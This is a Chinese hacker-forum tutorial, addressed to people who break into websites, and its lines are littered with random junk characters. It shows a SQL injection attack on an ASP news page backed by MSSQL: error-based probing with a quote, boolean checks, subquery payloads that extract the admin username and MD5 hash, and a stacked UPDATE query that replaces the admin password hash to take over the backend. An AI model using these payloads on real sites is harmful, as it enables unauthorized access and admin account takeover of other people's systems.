经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。$ y. A5 b- [" L2 ~0 q- b3 d# G3 l5 f7 E
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
8 ^3 q- c/ z1 w4 C2 \$ u! Y测试如下:
. x, x$ d S3 m+ z: Z% u( Ghttp://www.tmdsb.com/news.asp?id=121% Y4 ?4 Q( K% U [: F3 b% T# \" X
在地址后输入单引号,显示; s/ s# M, d! P& e. E
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’, E. m. e {9 I
字符串 ’’’ 之前有未闭合的引号
5 ]! j& P l' F) U" z% ~( t/news/tmdws.asp,行63- b% H P" N- k1 B, x$ d: s
说明没有过滤单引号且数据库是MSSQL.7 g: A! @7 }6 v8 _
and 1=1正常。and 1=2出错。肯定存在注入
9 x' {! Z' ]6 i接着输入4 H1 {) E' a7 v7 g/ B, Q6 }
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)' y. U1 o" V8 p1 T/ S& @3 e
得到帐号为:admin
0 f; H9 b1 X0 S' Z% Yhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)0 q: _0 ^' O( @
得到密码为:a4716077c2ba075c
# y& g/ v9 y! c" {3 |; o接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
& s& X: j% L9 l6 E5 u. B2 U命令如下 :
, V: k: p8 m# B4 O6 {6 l;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–: k& ^, o3 D8 w3 @
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |